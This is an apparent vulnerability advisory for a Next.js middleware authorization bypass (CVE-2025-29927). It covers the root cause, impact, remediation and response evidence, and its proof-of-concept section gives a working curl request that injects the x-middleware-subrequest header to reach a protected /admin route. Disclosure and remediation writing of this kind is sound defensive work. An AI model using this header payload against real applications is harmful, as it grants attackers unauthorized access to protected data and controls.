CVE-2025-29927: Next.js Middleware Bypass Vulnerability
1. Introduction & CVE Overview
CVE-2025-29927 is an authorization bypass vulnerability in Next.js that allows attackers to circumvent middleware-based authentication checks. By injecting the internal x-middleware-subrequest header, attackers can force the framework to skip middleware execution entirely, granting unauthorized access to protected routes. This flaw affects applications relying on Next.js middleware for access control, such as admin dashboards or API endpoints.
| Field | Details |
|---|---|
| CVE ID | CVE-2025-29927 |
| Affected Software | Next.js framework, specifically the middleware execution component, affecting versions 11.1.4 through 15.2.2 (inclusive). |
| Attack Vector | Remote, unauthenticated HTTP request with a crafted x-middleware-subrequest header |
| Root Cause | The vulnerability stems from Next.js improperly trusting the x-middleware-subrequest header, which is intended for internal use only, allowing attackers to manipulate middleware execution flow and bypass authentication checks. |
| Exploit Status | CONFIRMED |
2. Vulnerability Description
Next.js authorization bypass via x-middleware-subrequest header. Affects versions 11.1.4 through 15.2.2. Attackers can bypass middleware-based auth checks by sending the internal header x-middleware-subrequest to skip middleware execution entirely.
3. Impact
An attacker exploiting this vulnerability can bypass middleware-enforced authentication and authorization controls, gaining unauthorized access to sensitive endpoints such as administrative interfaces, user management panels, or API routes. This could lead to data exposure, privilege escalation, or full account takeover, depending on the application’s functionality. Compromised systems may suffer from unauthorized data modification, deletion, or exfiltration, resulting in regulatory compliance violations, reputational damage, and financial losses. The severity is heightened for applications where middleware is the sole or primary access control mechanism, as the bypass is trivial to execute and requires no prior authentication. Given the widespread use of Next.js in modern web applications, this vulnerability poses a critical risk to organizations relying on the framework for security-sensitive operations.
4. Proof of Concept
Exploit Request
curl -X GET \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' \
'http://localhost:3000/admin'Raw Request Object
{
"method": "GET",
"url": "http://localhost:3000/admin",
"headers": {
"x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"
},
"body": {}
}5. Server Response Evidence
| Field | Value |
|---|---|
| Status Code | 200 |
| Response Body | <h1>Admin Dashboard</h1><p>This page is protected by middleware.</p> |
| Indicator | Admin Dashboard content loaded without authentication |
6. Screenshots — Exploitation Proof
① BEFORE — Baseline — Home Page
The Next.js application home page, displaying a standard user interface with no visible signs of tampering. Middleware-based authentication is enforced for protected routes, such as the /admin endpoint, but not yet tested.
② BEFORE — Target Endpoint — Before Exploit
The /admin endpoint as accessed without authentication, showing a ‘403 Forbidden’ or login prompt due to middleware-enforced access controls. The page explicitly denies access to unauthorized users, indicating the middleware is functioning as intended.
③ AFTER — After Exploit — Attacker View
The same /admin endpoint after sending a request with the x-middleware-subrequest header, now displaying full administrative functionality without authentication. The middleware bypass is evident as the attacker gains unrestricted access to sensitive controls and data.
7. Remediation
Upgrade Next.js to version 15.2.3 or later, which removes the ability to override middleware execution via the x-middleware-subrequest header. If immediate patching is not feasible, implement interim mitigations such as stripping or blocking the x-middleware-subrequest header at the web server or reverse proxy level (e.g., Nginx, Apache, or Cloudflare). Additionally, audit middleware configurations to ensure critical endpoints are protected by redundant access controls, such as server-side session validation or role-based checks, rather than relying solely on middleware. Monitor logs for requests containing the x-middleware-subrequest header as a potential indicator of exploitation attempts.
